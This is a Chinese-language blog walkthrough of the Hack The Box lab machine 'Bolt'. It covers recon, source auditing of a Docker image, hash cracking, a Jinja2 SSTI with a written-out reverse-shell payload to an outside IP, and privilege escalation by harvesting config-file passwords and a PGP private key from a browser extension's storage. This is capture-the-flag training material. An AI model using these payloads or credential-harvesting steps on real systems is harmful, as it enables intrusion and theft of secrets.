[Hack The Box] HTB—Bolt walkthrough
2024-04-10 15:42:45
[Hack The Box] HTB—Bolt walkthrough
咕咕咕咕咕,咕到retired我就可以抄walkthrough了
HTB—Bolt
- [Hack The Box] HTB—Bolt walkthrough
- 一、信息搜集
- 1.端口
- 2.vhosts
- 二、网站渗透
- 1.docker分析
- 2.源码审计
- 3.SSTI
- 三、提权
- 1.找密码登陆eddie
- 2.eddle private key
- 3.PGP解密
官方wp:https://app.hackthebox.com/machines/Bolt/walkthroughs
一、信息搜集
1.端口
nmap
nmap -sV 10.10.11.114
深度扫描开放端口
nmap -sC -sV -n -T5 -p 22,80,443 10.10.11.114 -oN PortsDepth.txt PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
| 256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_ 256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Starter Website - About
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_http-server-header: nginx/1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after: 2022-02-24T19:11:23
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
443端口的ssl证书公用名commonName=passbolt.bolt.htb
公用名 (AKA CN) 表示受 SSL 证书保护的服务器名称。仅当请求主机名与证书公用名匹配时,证书才有效。大多数 Web 浏览器在连接到与证书中的公用名不匹配的地址时会显示警告消息。
The Common Name (AKA CN) represents the server name protected by the SSL certificate. The certificate is valid only if the request hostname matches the certificate common name. Most web browsers display a warning message when connecting to an address that does not match the common name in the certificate.
修改hosts将两个域名都加上
10.10.11.114 bolt.htb
10.10.11.114 passbolt.bolt.htb
Passbolt | Open source password manager for teams
Starter Website - About (bolt.htb)
2.vhosts
扫描子域名看看(ffuf我也试过,感觉gobuster好用一点)
gobuster vhost -w /usr/share/dnsrecon/subdomains-top1mil.txt -u http://bolt.htb/
得到另外两个个子域名
Found: mail.bolt.htb (Status: 200) [Size: 4943]
Found: demo.bolt.htb (Status: 302) [Size: 219]
http://mail.bolt.htb/
http://deom.bolt.htb/
二、网站渗透
80 bolt cms,有个命令执行漏洞,但是需要用户(后来发现根本不是一个boltcms……)
注册失败,爆破admin用户没有成功
1.docker分析
翻翻主页发现有个download选项,把镜像下载下来
导入并运行docker镜像image.tar
docker load --input image.tar
docker images //查看镜像
# flask-dashboard-adminlte_appseed-app latest 859e74798e6c 11 months ago 154MBdocker run -itd 859e74798e6c //运行image
docker exec -it 623ea34 /bin/sh //进入容器
发现网站文件是在/app下,cp命令复制出来
docker cp 623ea347a31f:app ./app
再加上根目录下运行的run.py和配置文件config.py,稍微看一下源码
2.源码审计
config.py
import os
from decouple import configclass Config(object):basedir = os.path.abspath(os.path.dirname(__file__))# Set up the App SECRET_KEYSECRET_KEY = config('SECRET_KEY', default='S#perS3crEt_007')# This will create a file in <app> FOLDERSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')SQLALCHEMY_TRACK_MODIFICATIONS = FalseMAIL_SERVER = 'localhost'MAIL_PORT = 25MAIL_USE_TLS = FalseMAIL_USE_SSL = FalseMAIL_USERNAME = NoneMAIL_PASSWORD = NoneDEFAULT_MAIL_SENDER = 'support@bolt.htb'class ProductionConfig(Config):DEBUG = False# SecuritySESSION_COOKIE_HTTPONLY = TrueREMEMBER_COOKIE_HTTPONLY = TrueREMEMBER_COOKIE_DURATION = 3600# PostgreSQL databaseSQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(config( 'DB_ENGINE' , default='postgresql' ),config( 'DB_USERNAME' , default='appseed' ),config( 'DB_PASS' , default='pass' ),config( 'DB_HOST' , default='localhost' ),config( 'DB_PORT' , default=5432 ),config( 'DB_NAME' , default='appseed-flask' ))class DebugConfig(Config):DEBUG = True# Load all possible configurations
config_dict = {'Production': ProductionConfig,'Debug' : DebugConfig
}
SQLALCHEMY_DATABASE_URI这种格式很明显就可以看出是利用flask_sqlalchemy库或者sqlalchemy库连接postgresql的
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')
postgresql://appseed:pass@localhost:5432/appseed-flask
但是这里我恢复的最新的docker容器没有db.sqlite3,他在a4ea的那个layer下
sqlite3没有加密,导出打开
admin $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
再回去看密码的加密方式
app/base/routes.py
@blueprint.route('/login', methods=['GET', 'POST'])
def login():login_form = LoginForm(request.form)if 'login' in request.form:# read form datausername = request.form['username']password = request.form['password']# Locate useruser = User.query.filter_by(username=username).first()# Check the passwordstored_password = user.passwordstored_password = stored_password.decode('utf-8')if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):login_user(user)return redirect(url_for('base_blueprint.route_default'))# Something (user or pass) is not okreturn render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)
compare_hash(stored_password,crypt.crypt(password,stored_password)),后来我发现John the Ripper可以识别加密并爆破!不用写py脚本
john -w=/usr/share/wordlists/rockyou.txt admin.hash
admin用户密码
admin/deadbolt
大佬的py脚本
这个用户密码是登陆http://bolt.htb/admin/home的,但是这个主站没有什么漏洞的地方
而mail.bolt.htb的admin账户登陆会返回错误,尝试在demo.bolt.htb里面注册个新的用户
41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad的layer下app\base\routes.py
@blueprint.route('/register', methods=['GET', 'POST'])
def register():login_form = LoginForm(request.form)create_account_form = CreateAccountForm(request.form)if 'register' in request.form:username = request.form['username']email = request.form['email' ]code = request.form['invite_code']if code != 'XNSS-HSJW-3NGU-8XTJ':return render_template('code-500.html')data = User.query.filter_by(email=email).first()if data is None and code == 'XNSS-HSJW-3NGU-8XTJ':# Check usename existsuser = User.query.filter_by(username=username).first()if user:return render_template( 'accounts/register.html', msg='Username already registered',success=False,form=create_account_form)# Check email existsuser = User.query.filter_by(email=email).first()if user:return render_template( 'accounts/register.html', msg='Email already registered', success=False,form=create_account_form)# else we can create the useruser = User(**request.form)db.session.add(user)db.session.commit()return render_template( 'accounts/register.html', msg='User created please <a href="/login">login</a>', success=True,form=create_account_form)else:return render_template( 'accounts/register.html', form=create_account_form)
拿到邀请码code == 'XNSS-HSJW-3NGU-8XTJ'
3.SSTI
注册后登陆,(之前看到是Jinja2)再搜render_template找ssti漏洞,看profile这段源码
@blueprint.route("/example-profile", methods=['GET', 'POST'])
@login_required
def profile():"""Profiles"""if request.method == 'GET':return render_template('example-profile.html', user=user,current_user=current_user)else:"""Experimental Feature"""cur_user = current_useruser = current_user.usernamename = request.form['name']experience = request.form['experience']skills = request.form['skills']msg = Message(recipients=[f'{cur_user.email}'],sender = 'support@example.com',reply_to = 'support@example.com',subject = "Please confirm your profile changes")try:cur_user.profile_update = nameexcept:return render_template('page-500.html')db.session.add(current_user)db.session.commit()token = ts.dumps(user, salt='changes-confirm-key')confirm_url = url_for('home_blueprint.confirm_changes',token=token,_external=True)html = render_template('emails/confirm-changes.html',confirm_url=confirm_url)msg.html = htmlmail.send(msg)return render_template('index.html')
修改profile时候会有ssti,这里需要到邮箱里面确认
@blueprint.route('/confirm/changes/<token>')
def confirm_changes(token):"""Confirmation Token"""try:email = ts.loads(token, salt="changes-confirm-key", max_age=86400)except:abort(404)user = User.query.filter_by(username=email).first_or_404()name = user.profile_updatetemplate = open('templates/emails/update-name.html', 'r').read()msg = Message(recipients=[f'{user.email}'],sender = 'support@example.com',reply_to = 'support@example.com',subject = "Your profile changes have been confirmed.")msg.html = render_template_string(template % name)mail.send(msg)
去mail.bolt.htb用刚刚注册时候填的邮箱登陆,msg.html = render_template_string(template % name)确认有ssti
{{''.__class__.__mro__}}
#(<class 'str'>, <class 'object'>)找object可用引用
{{''.__class__.__mro__[1].__subclasses__()}}
# <class 'os._wrap_close'>是第129个{{"".__class__.__bases__[0].__subclasses__()[129].__init__.__globals__['popen']('whoami').read()}}
//这个payload不行
//找到了这个,Jinja2创建的url_for()方法
{{url_for.__globals__.os.popen("whoami").read()}}//反弹shell
{{url_for.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.9/4444 0>&1"').read()}}
nc -lvvp 4444
三、提权
1.找密码登陆eddie
查看可登陆\有权限的用户
cat /etc/passwd|grep -v nologin |grep -v falseroot:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
连接数据库,看有没有其他用户的信息
www-data@bolt:~/demo$ cat config.py
cat config.py
"""Flask Configuration"""
#SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
SQLALCHEMY_DATABASE_URI = 'mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SECRET_KEY = 'kreepandcybergeek'
MAIL_SERVER = 'localhost'
MAIL_PORT = 25
MAIL_USE_TLS = False
MAIL_USE_SSL = False
#MAIL_DEBUG = app.debug
MAIL_USERNAME = None
MAIL_PASSWORD = None
DEFAULT_MAIL_SENDER = 'support@bolt.htb'
mysql://bolt_dba:dXUUHSW9vBpH5qRB@localhost/boltmail
bolt_dba/dXUUHSW9vBpH5qRB
mysql -ubolt_dba -pdXUUHSW9vBpH5qRB
use boltmail;
show tables; # user
select * from user;
当前用户权限不够不能看mysql库,boltmail库没有我需要的
然后就不会了,wp说要根据用户查文件:
find /etc -user www-data 2>/dev/null
# /etc/passbolt/Seeds
在/etc/passbolt/passbolt.php 中存在一个passwd: rT2;jW7<eY8!dX8}pQ8%有如下数据库信息:
// Database configuration.'Datasources' => ['default' => ['host' => 'localhost','port' => '3306','username' => 'passbolt','password' => 'rT2;jW7<eY8!dX8}pQ8%','database' => 'passboltdb',],],
连接
mysql --user=passbolt --password='rT2;jW7<eY8!dX8}pQ8%' --database=passboltdb
show tables;
# 有两个表可以看看,user和secretaccount_settingsaction_logsactionsauthentication_tokensavatarscommentsemail_queueentities_historyfavoritesgpgkeysgroupsgroups_usersorganization_settingspermissionspermissions_historyphinxlogprofilesresource_typesresourcesrolessecret_accessessecretssecrets_historyuser_agentsusersselect * from secrets; //会显示不全
select * from users;
select * from secrets\G //在MySQL的sql语句后加上\G ,表示将查询结果进行按列打印,可以使每个字段打印到单独的行。
secret
*************************** 1. row *************************** id: 643a8b12-c42c-4507-8646-2f8712af88f8 user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc
resource_id: cd0270db-c83f-4f44-b7ac-76609b397746 data: -----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc
g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY
pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H
oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px
l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R
zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp
edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u
l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt
oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7
FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov
8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey
5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY
NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a
Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs
nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6
TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984
=P38i
-----END PGP MESSAGE-----created: 2021-02-25 21:50:11modified: 2021-03-06 15:34:36
其实我们之前拿到的密码也是eddie用户的密码
eddie/rT2;jW7<eY8!dX8}pQ8%
切换用户
su - eddie
python3 -c 'import pty;pty.spawn("/bin/bash")'
eddie用户目录下有个user.txt,应该也是flag
2.eddle private key
find /var -user eddie 2>/dev/null
# /var/mail/eddiecd /var/mail
ls
# eddie none root www-data xiaoz
看到邮件内容
eddie@bolt:/var/mail$ cat eddie
From clark@bolt.htb Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>Hey Eddie,The password management server is up and running. Go ahead and download the extension to your browser and get logged in. Be sure to back up your private key because I CANNOT recover it. Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords. Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...-Clark
应该找私钥 Your private key is the only way to recover your account.,联系之前数据库中拿到的secret,应该是PGP私钥
信任网络,PGP,GPG
优良保密协议(PGP)是一种基于信任网络的安全协议
OpenPGP
1997年,PGP成为一项互联网标准,称为OpenPGP。许多电子邮件系统都支持了OpenPGP。实际上,PGP信任网络的理念非常适合电子邮件特点。2007年,PGP协议进行了加密算法方面的更新,后来又加入了对Camellia,ECDSA, ECDH和EdDSA等加密算法的支持。
GPG
GNU Privacy Guard(GnuPG或GPG)是一种加密软件,它是PGP加密软件的满足GPL的替代物。GnuPG依照由IETF订定的OpenPGP技术标准设计。GnuPG用于加密、数位签章及产生非对称匙对的软件。
(Go ahead and download the extension to your browser and get logged in.私钥可能是在浏览器的缓存里面)在home目录找私钥
谷歌数据路径:~/.config/google-chrome/Default
火狐数据路径:〜/ Library / Mozilla / Firefox / Profiles / xxxxxxxx.default /
〜/ Library / Application Support / Mozilla / Firefox / Profiles / xxxxxxxx.default /
grep -r 'BEGIN PGP PRIVATE KEY' ~/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js:const PRIVATE_HEADER = '-----BEGIN PGP PRIVATE KEY BLOCK-----';
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js: // BEGIN PGP PRIVATE KEY BLOCK
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js: result.push("-----BEGIN PGP PRIVATE KEY BLOCK-----\r\n");
Binary file /home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log matches
把符合私钥格式的段落筛出
strings '/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1strings '/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js' | grep -oP '\-\-\-\-\-BEGIN PGP PRIVATE [\s\S]*?END PGP PRIVATE KEY BLOCK\-\-\-\-\-' | head -1
得到私钥
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.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
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----
3.PGP解密
PGP私钥通常有密码加密,可以用gpg2john计算哈希并用john破解
gpg2john.exe pgp.txt > hash
john.exe hash
密码:merrychristmas
用在线工具(PGP 工具 - 在线 PGP 密钥生成器加密解密工具 (pgptool.org))解密之前数据库中得到的加密pgp消息
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}
得到root的秘密,切换用户
得到flag 4a1c94ec439b2a1c143f228b6114155a
参考wp:
【HTB系列】Bolt l [承影安全团队ChengYingTeam]
Bolt - [HTB] | Marmeus’s Website
Bolt|(7rocky.github.io)
[Hack The Box] HTB—Bolt walkthrough相关推荐
- [Hack The Box] HTB—Paper walkthrough
[Hack The Box] HTB-Paper walkthrough HTB-Paper [Hack The Box] HTB-Paper walkthrough 一.信息搜集 X-Backend ...
- HTB Optimum[Hack The Box HTB靶场]writeup系列6
这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行s ...
- 【Hack The Box】linux练习-- SneakyMailer
HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer
- Hack The Box - Access Writeup
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗.收获还是很大,在此记录一下,以便后阅. 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21 ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- 【Hack The Box】linux练习-- Blunder
HTB 学习笔记 [Hack The Box]linux练习-- Blunder
- 【Hack The Box】windows练习-- Silo
HTB 学习笔记 [Hack The Box]windows练习-- Silo
- 【Hack The Box】linux练习-- Ophiuchi
HTB 学习笔记 [Hack The Box]linux练习-- Ophiuchi
- 【Hack The Box】linux练习-- Doctor
HTB 学习笔记 [Hack The Box]linux练习-- Doctor
- 【Hack The Box】linux练习-- Tabby
HTB 学习笔记 [Hack The Box]linux练习-- Tabby
最新文章
- mysql 数据泵_Oracle 数据泵详解
- 使用 Gatsby.js 搭建静态博客 EX 使用语雀发布到博客
- 功率谱 魏凤英统计程序_频谱、能量谱、功率谱、功率谱估计
- 2019-4-23 plan
- leetcode 将包含 n 个元素的数组向右旋转 k 步
- reactinput聚焦事件_React focus 事件的坑
- Ubuntu 18.04安装ROS 2
- .NET和Java之争
- CTFHUB 《请求方式》 http请求,curl命令总结
- asp.net core部署到iis
- java glob paths_何时在JAVA的glob语法中使用**(双星)
- MySQL数据教程(一)数据库概念,超详细安装和配置数据库,数据库可视化界面介绍
- Canoe-基于14229的UDS自动化测试脚本CAPL 这适用于CANoe无diva的测试脚本
- Centos安装beef
- android 绘画笔迹回放_android画板笔锋实现
- AUV运动控制仿真(PID控制)
- GPT-4 终问世!旧王已死,新王当立!面对AI,人类真的准备好了吗?
- 简单的led驱动 了解下
- PS制作各种证件照及换背景色
- eSIM卡业务开通地区